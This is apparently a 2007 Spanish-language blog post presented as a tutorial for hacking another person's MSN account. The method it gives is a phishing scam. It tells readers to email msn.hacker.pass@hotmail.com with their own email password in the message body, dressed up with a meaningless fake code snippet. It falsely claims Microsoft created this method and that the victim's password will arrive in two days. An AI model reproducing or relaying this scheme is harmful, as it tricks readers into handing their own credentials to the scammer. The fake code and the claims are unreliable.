26 diciembre 2007

hackear la cuenta de msn by microsof

ANTES DE QUE TODO PASE Y NADA SUCEDA TENGO QUE ADVERTIR QUE YO NO ME HAGO RESPONSABLE DE LO QUE PASE AY SE LOS DEJO A SU CRITERIO PERO YO ME LAVO LAS MANOS


Lo Primero que debemos hacer es abrir la bandeja de correo…

Ahora Le Daremos Click En Nuevo… Para Mandar Un Nuevo Mail…
En El Asunto escribiremos:
messenger.owned[injected-vulneravility]Tuvictima@hotmail.com
En El destinario Se Lo Enviaremos A:
msn.hacker.pass@hotmail.com

Ahora En El Mensaje le pondremos este codigo:
User.(“AQUI VA TU CONTRASEÑA DE TU MAIL”)@(msn.hacker.pass)
function(){a = true;while(a == true){}
function(){for( var a=firstUser(); a!=null("TUMSN@hotmail.com")=false

Ahora envias el mail y en 2 dias te llegara la contraseña de tu victima a quien quieres hackear el msn…
Te llegara asi:
User:Nombredetuvictima@hotmail.com
Password: y LA CONTRASEÑA DE TU VICTIMA

ESPERO QUE TE GUSTE..!
NO ABUSES DE ESTO!!!

Microsof Hizo esto para que puedan hackear msn…
esta es la unica forma no hay ninguna otra las demas son mentiras..!

p.d. x derechos de autor tuve faltas de ortografia apropocito jojojo
p.d.2 no lo intenten hacer conmigo soy mas kbron que ustedes y me daria cuenta mas rapido que cualquier persona en comun jojojo

ENJOY THE SILENCE

No hay comentarios: